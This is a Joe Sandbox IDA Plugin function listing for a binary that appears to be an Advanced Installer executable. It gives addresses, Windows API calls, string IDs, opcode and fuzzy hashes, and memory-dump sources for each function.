                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$LongWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 312131281-0
                                                                                                                                                                        • Opcode ID: 93c7ed6421ab2a6e255b9ab425c6706da21c4162aa7a850223e4368c44c44d33
                                                                                                                                                                        • Instruction ID: accd8b6daae47713bdf2ff1d9fe474793bda88d65eb726d303bf68109e8d3dc5
                                                                                                                                                                        • Opcode Fuzzy Hash: 93c7ed6421ab2a6e255b9ab425c6706da21c4162aa7a850223e4368c44c44d33
                                                                                                                                                                        • Instruction Fuzzy Hash: 08214F31958346AAD220DF11CD44B5ABBF1BFED758F206B0EF1D4211A4E7F192848E86
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC3AB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 231windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateWindowExW.USER32(00000000,AtlAxWin140,?,?,?,80000000,00000000,00000000,?,00000000,00000000), ref: 00BC3B26
                                                                                                                                                                        • SendMessageW.USER32(?,00000000,00000000), ref: 00BC3C22
                                                                                                                                                                          • Part of subcall function 00BC5580: SysFreeString.OLEAUT32(00000000), ref: 00BC5623
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFreeMessageSendStringWindow
                                                                                                                                                                        • String ID: AtlAxWin140$K
                                                                                                                                                                        • API String ID: 4045344427-841691727
                                                                                                                                                                        • Opcode ID: 5ca76d735fea9cbc5f9a74dcea4ef60477af2ee5503504e6049b08a7d756ac58
                                                                                                                                                                        • Instruction ID: f6fb575f8084bda9af5a5ad4228d08afcdacd1607e50db5e49896fd5ee861054
                                                                                                                                                                        • Opcode Fuzzy Hash: 5ca76d735fea9cbc5f9a74dcea4ef60477af2ee5503504e6049b08a7d756ac58
                                                                                                                                                                        • Instruction Fuzzy Hash: A0910374600205EFDB14DF68C888F9ABBF9FF49724F148599F819AB291C771EA05CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CFF520 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 167COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        • CloseHandle.KERNEL32(?,1FC3D414,000000C9,00000000), ref: 00CFF6A3
                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,1FC3D414,000000C9,00000000), ref: 00CFF731
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer$CloseCriticalDeleteHandleHeapProcessSection
                                                                                                                                                                        • String ID: << Advanced Installer (x86) Log >>$<3
                                                                                                                                                                        • API String ID: 3699736680-3345534290
                                                                                                                                                                        • Opcode ID: 52667877669f41d864bb8ee5864e2a8b3320e3974414cd5891b50507246401d3
                                                                                                                                                                        • Instruction ID: c288bee4b6e0b7f4b5adc13c3103f4fe38932b2a2eed698cd5f0681061c6f518
                                                                                                                                                                        • Opcode Fuzzy Hash: 52667877669f41d864bb8ee5864e2a8b3320e3974414cd5891b50507246401d3
                                                                                                                                                                        • Instruction Fuzzy Hash: F561D170900646DFDB01CF6DC98879ABBF4FF45314F10829EE420AB392DBB59A49CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D106E0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 167synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,1FC3D414), ref: 00D10714
                                                                                                                                                                          • Part of subcall function 00CB6270: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,00000000,?,00000000,00DB225D,000000FF,?,80004005,?,?), ref: 00CB6288
                                                                                                                                                                          • Part of subcall function 00CB6270: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,?,80004005,?,?,?,00000000,00DE48ED,000000FF,?,00CB4B55), ref: 00CB62BA
                                                                                                                                                                          • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$AllocHeapObjectSingleWait
                                                                                                                                                                        • String ID: *.*$.jar$.pack
                                                                                                                                                                        • API String ID: 760676496-3892993289
                                                                                                                                                                        • Opcode ID: ab6a81245219fa8294c7189396bf299cdef88c3d976dc48a7adf3d10fe5b6772
                                                                                                                                                                        • Instruction ID: bedef8d1a83cc39381cdbabe2fc2eb4d7ea592c3c464249f9bbf1cec75f5b4d7
                                                                                                                                                                        • Opcode Fuzzy Hash: ab6a81245219fa8294c7189396bf299cdef88c3d976dc48a7adf3d10fe5b6772
                                                                                                                                                                        • Instruction Fuzzy Hash: A1516470A01609EFDB10EFA9D844BAEFBB4FF44314F144269E425A7291DB74E985CFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC0610 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(combase.dll,RoOriginateLanguageException), ref: 00BC0652
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BC0658
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                        • String ID: RoOriginateLanguageException$combase.dll
                                                                                                                                                                        • API String ID: 2574300362-3996158991
                                                                                                                                                                        • Opcode ID: 138704a462d359ef00b330524de121ce51f33ce0f64e3b5202543277d61ac312
                                                                                                                                                                        • Instruction ID: 8151dc95c741777b24c2cf2895d18751e33dd85fb1acab6c5803b5b452dce8b2
                                                                                                                                                                        • Opcode Fuzzy Hash: 138704a462d359ef00b330524de121ce51f33ce0f64e3b5202543277d61ac312
                                                                                                                                                                        • Instruction Fuzzy Hash: 31314F71910209EFDB10EFA4C905BEEB7F4EB04314F14857EE865A72D0EBB85A44CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00C6F120 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsWindow.USER32(00000004), ref: 00C6F16A
                                                                                                                                                                        • DestroyWindow.USER32(00000004,?,?,?,?,?,?,?,?,000000FF), ref: 00C6F177
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Destroy
                                                                                                                                                                        • String ID: T$$|$
                                                                                                                                                                        • API String ID: 3707531092-3050406125
                                                                                                                                                                        • Opcode ID: 6e2ea5e7e1544f6f568ba9904ac06ffdf154c56181df0768b49df90d1dcfe438
                                                                                                                                                                        • Instruction ID: 1cc736b877347c908045959a66928f15fe2d1efe71fab1b9d6fa2cbb827b6270
                                                                                                                                                                        • Opcode Fuzzy Hash: 6e2ea5e7e1544f6f568ba9904ac06ffdf154c56181df0768b49df90d1dcfe438
                                                                                                                                                                        • Instruction Fuzzy Hash: 1431DC70804689EFCB01EF69D90679EFBF4BF04314F50869DE064A3691DBB0AA08CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D7DAC5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Cnd_broadcastCurrentMtx_unlockThread
                                                                                                                                                                        • String ID: x
                                                                                                                                                                        • API String ID: 2021000804-2985756205
                                                                                                                                                                        • Opcode ID: 71b2fe114a02b90303af788872719721de4d5182e076bd3bda1d26bfdcea2ab0
                                                                                                                                                                        • Instruction ID: 329cb0f4139fdfea99fd58a010a50365ed6c6510dfd3b3d7d3b0aaddc478dc42
                                                                                                                                                                        • Opcode Fuzzy Hash: 71b2fe114a02b90303af788872719721de4d5182e076bd3bda1d26bfdcea2ab0
                                                                                                                                                                        • Instruction Fuzzy Hash: 4101BC366007029FDB259FA5C8516AAF3B6FF50365F198439E45EA7240F731AC00CAB0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D84C0C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00D84BBD,?,?,00000000,?,?,?,00D84CE7,00000002,FlsGetValue,00E09F08,FlsGetValue), ref: 00D84C19
                                                                                                                                                                        • GetLastError.KERNEL32(?,00D84BBD,?,?,00000000,?,?,?,00D84CE7,00000002,FlsGetValue,00E09F08,FlsGetValue,?,?,00D81B04), ref: 00D84C23
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00D84C4B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                        • API String ID: 3177248105-2084034818
                                                                                                                                                                        • Opcode ID: af1007659f603cde4c66010d4f5a769485048ebb3472eab457ab97eca6cb63f7
                                                                                                                                                                        • Instruction ID: 730d00f8b673e189c7729625b691b591b4ae73c49ed097ff539b3a8a52e5650c
                                                                                                                                                                        • Opcode Fuzzy Hash: af1007659f603cde4c66010d4f5a769485048ebb3472eab457ab97eca6cb63f7
                                                                                                                                                                        • Instruction Fuzzy Hash: 1CE04830240705BBFF102F51ED06B5D3B5DAB00B95F144031FA4CB40F5EB7299989755
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD6E30 Relevance: 6.3, APIs: 4, Instructions: 321windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 00BD6F78
                                                                                                                                                                        • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 00BD6F8D
                                                                                                                                                                          • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
                                                                                                                                                                          • Part of subcall function 00CABAD0: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,000000EF,?,00BD6FC8,00000000,80004005), ref: 00CABB38
                                                                                                                                                                          • Part of subcall function 00CABAD0: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CABB68
                                                                                                                                                                        • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00BD70C3
                                                                                                                                                                        • SendMessageW.USER32(?,00001061,00000000,00000005), ref: 00BD71BF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$AllocHeapWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2851540245-0
                                                                                                                                                                        • Opcode ID: fa5a28003387cb662097787eb3187ef2ee97bb175f8deb767e9d52153a41f3bd
                                                                                                                                                                        • Instruction ID: d3cf8495f8108f50266e9550731c79e1533e386c35c39d6072e299a76996c7cb
                                                                                                                                                                        • Opcode Fuzzy Hash: fa5a28003387cb662097787eb3187ef2ee97bb175f8deb767e9d52153a41f3bd
                                                                                                                                                                        • Instruction Fuzzy Hash: A8C17E71A002099FDB14DFA8C895BEEFBF5FF48314F14425AE415AB290EB75A944CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC5390 Relevance: 6.3, APIs: 4, Instructions: 269memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 00BC545A
                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00BC54A6
                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00BC54C8
                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00BC5623
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$Free$Alloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 986138563-0
                                                                                                                                                                        • Opcode ID: 707beaca8886a19f302a68e6566feb0aa736eda433bb39b8a6bd39c7a3f34bcc
                                                                                                                                                                        • Instruction ID: d396bba3d3dec063719bebf3a624b5339c079d1b2e8d024e3450c3c4abaa0883
                                                                                                                                                                        • Opcode Fuzzy Hash: 707beaca8886a19f302a68e6566feb0aa736eda433bb39b8a6bd39c7a3f34bcc
                                                                                                                                                                        • Instruction Fuzzy Hash: 7BA18D71A00609AFDB25CFA8CC85FAEB7F8EF44714F10425DE515E7280EB74AA45CB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BE0570 Relevance: 6.2, APIs: 4, Instructions: 246windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(00000001,0000110A,00000004,?), ref: 00BE0645
                                                                                                                                                                        • SendMessageW.USER32(00000001,0000110A,00000001,00000000), ref: 00BE0677
                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000004,?), ref: 00BE07EE
                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00BE0816
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                        • Opcode ID: f28fa67e677a95ad66e048b039cf223cf8fa1983a952af1e97302db90b398c91
                                                                                                                                                                        • Instruction ID: e310b3c2a4fb6720942c442b27aa495ab92415e62c31e166742ba48ff46bfc8b
                                                                                                                                                                        • Opcode Fuzzy Hash: f28fa67e677a95ad66e048b039cf223cf8fa1983a952af1e97302db90b398c91
                                                                                                                                                                        • Instruction Fuzzy Hash: D4916C71A10244AFCB25EF69D880BEEB7F5FF48310F0445A9E441A7291DBB0AC85CFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CFD610 Relevance: 6.2, APIs: 4, Instructions: 157registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,1FC3D414), ref: 00CFD686
                                                                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 00CFD6B0
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(00000000,1FC3D414,00000000,00000000,00000000,00000000,1FC3D414,00000001,?,00000000,00000000), ref: 00CFD733
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00CFD77F
                                                                                                                                                                          • Part of subcall function 00CFD530: RegOpenKeyExW.ADVAPI32(00000000,1FC3D414,00000000,00020019,00000002,1FC3D414,00000001,00000010,00000002,00CFC85C,1FC3D414,00000000,00000000), ref: 00CFD5CC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Close$OpenQueryValue_wcsrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 213811329-0
                                                                                                                                                                        • Opcode ID: e75ab037630c7e39a92f74e1f7aa9cb2d9924aa7c7dfbb850ecce892b3d07243
                                                                                                                                                                        • Instruction ID: 8becc14ac8c22264a866d03a62e50ac542f9c69a058191465abc441bed09c801
                                                                                                                                                                        • Opcode Fuzzy Hash: e75ab037630c7e39a92f74e1f7aa9cb2d9924aa7c7dfbb850ecce892b3d07243
                                                                                                                                                                        • Instruction Fuzzy Hash: 7151227290034D9FDB00DF68D944BAEBBB5EF40320F24826AF925AB3C0D7709A04CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CE4C80 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CloseHandle.KERNEL32(?,1FC3D414,?,?,?), ref: 00CE4D6A
                                                                                                                                                                        • CloseHandle.KERNEL32(?,1FC3D414,?,?,?), ref: 00CE4D8A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
